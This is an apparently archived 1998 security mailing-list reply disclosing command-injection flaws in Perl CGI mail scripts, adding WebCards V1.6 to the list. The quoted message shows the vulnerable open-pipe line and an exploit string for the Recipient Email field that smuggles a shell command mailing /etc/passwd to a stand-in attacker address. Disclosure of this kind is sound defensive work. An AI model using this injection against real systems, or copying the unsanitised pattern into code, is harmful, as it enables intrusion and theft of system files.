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Re: Several new CGI vulnerabilities

daemon@ATHENA.MIT.EDU (Karl Hanmore)
Tue Nov 10 16:14:24 1998

Date: 	Tue, 10 Nov 1998 18:45:24 +1000
Reply-To: Karl Hanmore <avatar@ULTRA.ULTRA.NET.AU>
From: Karl Hanmore <avatar@ULTRA.ULTRA.NET.AU>
X-To:         xnec <xnec@WINTERMUTE.LINUX.TC>
In-Reply-To:  <199811100026.SAA26763@wintermute.linux.tc>

        As a related note, the WebCards program (V1.6) by Sam Kareem
(webmaster@iraq.net) is subject to the same vunerability.


On Mon, 9 Nov 1998, xnec wrote:

>         After looking over the perl-CGI scripts on www.cgi-resources.com,
> I've discovered vulnerabilities in the following:


> Each of these are exploitable by inputing metacharacters into the
> recipient's email address.  Each script calls something similar
> to:
>  open( MAIL, "|$mailprog $email" )
>  # this particular line is from the LakeWeb scripts
> The exploit strings are simple, something like
> &mail evil@foobar.com < /etc/passwd&@host.com will work for each script
> (the @host.com is necessary because some hosts check for "@" and ".")
> when placed in the Recipient Email field.

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